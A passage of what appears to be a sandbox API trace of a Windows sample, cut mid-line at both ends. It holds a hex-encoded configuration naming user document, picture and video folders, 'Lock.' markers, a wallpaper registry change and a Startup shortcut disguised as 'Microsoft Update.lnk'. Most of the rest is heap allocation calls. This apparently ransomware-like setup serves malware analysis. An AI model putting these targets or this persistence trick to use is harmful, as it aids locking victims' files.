57250726F66696C6544697220!D46Co5C5069637475726573!D46Co2F!D46Co20405573657250726F66696C6544697220!D46Co5C5069637475726573!D46Co2F4C6F636B2E!D46Co383838!D46Co20405573657250726F66696C6544697220!D46Co5C5069637475726573!D46Co2F!D46Co20405573657250726F66696C6544697220!D46Co5C5069637475726573!D46Co2F!D46Co203120!D46Co20405573657250726F66696C6544697220!D46Co5C566964656F73!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co20405573657250726F66696C6544697220!D46Co5C566964656F73!D46Co2F!D46Co20405573657250726F66696C6544697220!D46Co5C566964656F73!D46Co2F4C6F636B2E!D46Co383838!D46Co20405573657250726F66696C6544697220!D46Co5C566964656F73!D46Co2F!D46Co20405573657250726F66696C6544697220!D46Co5C566964656F73!D46Co2F!D46Co203120!D46Co20405573657250726F66696C6544697220!D46Co5C446F63756D656E7473!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co20405573657250726F66696C6544697220!D46Co5C446F63756D656E7473!D46Co2F!D46Co20405573657250726F66696C6544697220!D46Co5C446F63756D656E7473!D46Co2F4C6F636B2E!D46Co383838!D46Co20405573657250726F66696C6544697220!D46Co5C446F63756D656E7473!D46Co2F!D46Co20405573657250726F66696C6544697220!D46Co5C446F63756D656E7473!D46Co2F!D46Co203120!D46Co433A5C55736572735C5075626C69635C446F63756D656E7473!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co433A5C55736572735C5075626C69635C446F63756D656E7473!D46Co2F!D46Co433A5C55736572735C5075626C69635C446F63756D656E7473!D46Co2F4C6F636B2E!D46Co383838!D46Co433A5C55736572735C5075626C69635C446F63756D656E7473!D46Co2F!D46Co433A5C55736572735C5075626C69635C446F63756D656E7473!D46Co2F!D46Co203120!D46Co433A5C55736572735C5075626C69635C5069637475726573!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co433A5C55736572735C5075626C69635C5069637475726573!D46Co2F!D46Co433A5C55736572735C5075626C69635C5069637475726573!D46Co2F4C6F636B2E!D46Co383838!D46Co433A5C55736572735C5075626C69635C5069637475726573!D46Co2F!D46Co433A5C55736572735C5075626C69635C5069637475726573!D46Co2F!D46Co203120!D46Co433A5C55736572735C5075626C69635C566964656F73!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co433A5C55736572735C5075626C69635C566964656F73!D46Co2F!D46Co433A5C55736572735C5075626C69635C566964656F73!D46Co2F4C6F636B2E!D46Co383838!D46Co433A5C55736572735C5075626C69635C566964656F73!D46Co2F!D46Co433A5C55736572735C5075626C69635C566964656F73!D46Co2F!D46Co203120!D46Co204054656D7044697220!D46Co2F3878387838!D46Co204074656D7064697220!D46Co203120!D46Co204074656D7064697220!D46Co2F3878387838!D46Co203130303020!D46Co484B43555C436F6E74726F6C2050616E656C5C4465736B746F70!D46Co57616C6C7061706572!D46Co5245475F535A!D46Co204074656D7064697220!D46Co5C776C2E6A7067!D46Co203020!D46Co20405374617274757044697220!D46Co2F4D6963726F736F6674205570646174652E6C6E6B!D46Co204053637269707446756C6C5061746820!D46Co204054656D7044697220!D46Co5C782E657865!D46Co204054656D7044697220!D46Co2F782E657865!D46Co20405374617274757044697220!D46Co2F4D6963726F736F6674205570646174652E6C6E6B!D46Co204054656D7044697220!D46Co") returned 8389 [0081.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64858 | out: hHeap=0x2af0000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4190) returned 0x2a79f20 [0081.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed040 | out: hHeap=0x2af0000) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e9048 | out: hHeap=0x2af0000) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04e0 | out: hHeap=0x2af0000) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64840 | out: hHeap=0x2af0000) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04d0 | out: hHeap=0x2af0000) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647e0 | out: hHeap=0x2af0000) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a98 [0081.664] CloseHandle (hObject=0x294) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649d8 | out: hHeap=0x2af0000) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69f18 | out: hHeap=0x2af0000) returned 1 [0081.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0081.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64918 | out: hHeap=0x2af0000) returned 1 [0081.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0081.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64900 | out: hHeap=0x2af0000) returned 1 [0081.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0660 | out: hHeap=0x2af0000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64888 [0081.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0670 [0081.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0081.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0081.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05b0 [0081.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05b0 | out: hHeap=0x2af0000) returned 1 [0081.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x418a) returned 0x29e6058 [0081.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05b0 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2af7338 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6f4) returned 0x2af7558 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05a0 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647e0 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64858 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64840 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0510 [0081.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64840 | out: hHeap=0x2af0000) returned 1 [0081.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64858 | out: hHeap=0x2af0000) returned 1 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649d8 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64840 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64918 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e06a0 [0081.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64918 | out: hHeap=0x2af0000) returned 1 [0081.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06a0 | out: hHeap=0x2af0000) returned 1 [0081.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64840 | out: hHeap=0x2af0000) returned 1 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64948 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0520 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a538a8 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64840 [0081.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64858 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64900 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0510 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64900 | out: hHeap=0x2af0000) returned 1 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64858 | out: hHeap=0x2af0000) returned 1 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64858 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0580 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5e2c0 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64900 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64918 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64978 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0650 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64978 | out: hHeap=0x2af0000) returned 1 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0650 | out: hHeap=0x2af0000) returned 1 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64918 | out: hHeap=0x2af0000) returned 1 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64918 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0640 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64978 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64990 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64cd8 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64ba0 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05f0 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64ba0 | out: hHeap=0x2af0000) returned 1 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05f0 | out: hHeap=0x2af0000) returned 1 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64cd8 | out: hHeap=0x2af0000) returned 1 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c30 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0650 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64ca8 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d80 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64bb8 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d20 [0081.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0630 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64d20 | out: hHeap=0x2af0000) returned 1 [0081.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64bb8 | out: hHeap=0x2af0000) returned 1 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d20 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0590 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53a60 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64b58 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64b70 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d38 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0630 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64d38 | out: hHeap=0x2af0000) returned 1 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64b70 | out: hHeap=0x2af0000) returned 1 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d98 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05f0 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53a38 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64ab0 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64b70 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64cc0 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04f0 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64cc0 | out: hHeap=0x2af0000) returned 1 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64b70 | out: hHeap=0x2af0000) returned 1 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64b10 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0600 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64b28 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d08 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c78 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64af8 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0630 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64af8 | out: hHeap=0x2af0000) returned 1 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64c78 | out: hHeap=0x2af0000) returned 1 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c48 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04b0 [0081.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c90 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64b70 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d38 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d50 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04c0 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64d50 | out: hHeap=0x2af0000) returned 1 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04c0 | out: hHeap=0x2af0000) returned 1 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64d38 | out: hHeap=0x2af0000) returned 1 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d38 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0660 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64b88 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c18 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c60 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d50 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0670 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64d50 | out: hHeap=0x2af0000) returned 1 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64c60 | out: hHeap=0x2af0000) returned 1 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c60 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0680 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5ddf8 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64c78 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64ae0 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64cc0 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0620 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64cc0 | out: hHeap=0x2af0000) returned 1 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64ae0 | out: hHeap=0x2af0000) returned 1 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64af8 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0530 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64cc0 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64d50 [0081.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64ac8 [0081.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64cd8 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05c0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64ac8 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64bd0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05c0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64bb8 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64cf0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64bb8 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64d68 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64bd0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64c00 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0550 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64be8 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65038 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64fd8 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64e58 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65080 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64f18 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05d0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64e10 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64f60 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65008 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64f48 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05d0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64f18 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64ed0 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64f00 | out: hHeap=0x2af0000) returned 1 [0081.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65038 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64e40 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64fa8 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64ee8 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65008 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0550 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64e40 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64e70 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06d0 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65038 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64ea0 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07b0 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64e70 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64ee8 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0840 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64eb8 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65110 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0770 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a651e8 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65170 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0770 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a650b0 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65110 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e07f0 | out: hHeap=0x2af0000) returned 1 [0081.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a65398 | out: 